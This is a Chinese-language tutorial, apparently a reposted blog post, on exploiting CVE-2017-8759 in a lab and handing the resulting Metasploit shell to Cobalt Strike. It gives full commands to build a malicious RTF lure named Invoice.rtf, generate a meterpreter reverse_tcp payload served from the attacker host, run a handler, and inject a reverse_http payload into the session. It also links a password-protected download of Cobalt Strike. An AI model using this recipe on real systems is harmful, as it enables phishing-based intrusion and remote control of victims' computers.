1. 前言
metasploit 获取的 shell 派生给其他工具,例如 Cobaltstrike
以 CVE-2017-8759 为例通过 msf 获取 shell 后派生给 Cobaltstrike
2. 环境
Kali : 192.168.229.143
win7 : 192.168.229.137
Cobaltstrike+jdk:链接:http://pan.baidu.com/s/1eSJ7P54 ??密码:krqnCVE-2017-8759-exp: ???https://github.com/bhdresh/CVE-2017-8759.git
3. exploit CVE-2017-8759
# git clone https://github.com/bhdresh/CVE-2017-8759.git1) 生成 RTF 文件 ??# python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.229.143/logo.txt ??2) 生成 MSF payload 并启动 handler ??# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.229.143 LPORT=4444 -f exe > /tmp/shell.exe ??# msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.229.143; run" ??3) 开发模式下传送本地 payload ??# python cve-2017-8759_toolkit.py -M exp -e http://192.168.229.143/shell.exe -l /tmp/shell.exe
4. 派生 shell 给 Cobalt strike
打开 Cobalt strike 创建一个新的监听器
注入一个新的 payload 到当前 session 中
msf exploit(handler) > ?use exploit/windows/local/payload_injectmsf exploit(payload_inject) > ?set PAYLOAD windows/meterpreter/reverse_httpmsf exploit(payload_inject) > set DisablePayloadHandler truemsf exploit(payload_inject) > set LHOST 192.168.229.143msf exploit(payload_inject) > set LPORT 1212msf exploit(payload_inject) > set SESSION 1msf exploit(payload_inject) > exploit
http://blog.csdn.net/qq_27446553/article/details/52282457
metasploit 派生 shell
原文地址:http://www.cnblogs.com/trojan-z/p/7600928.html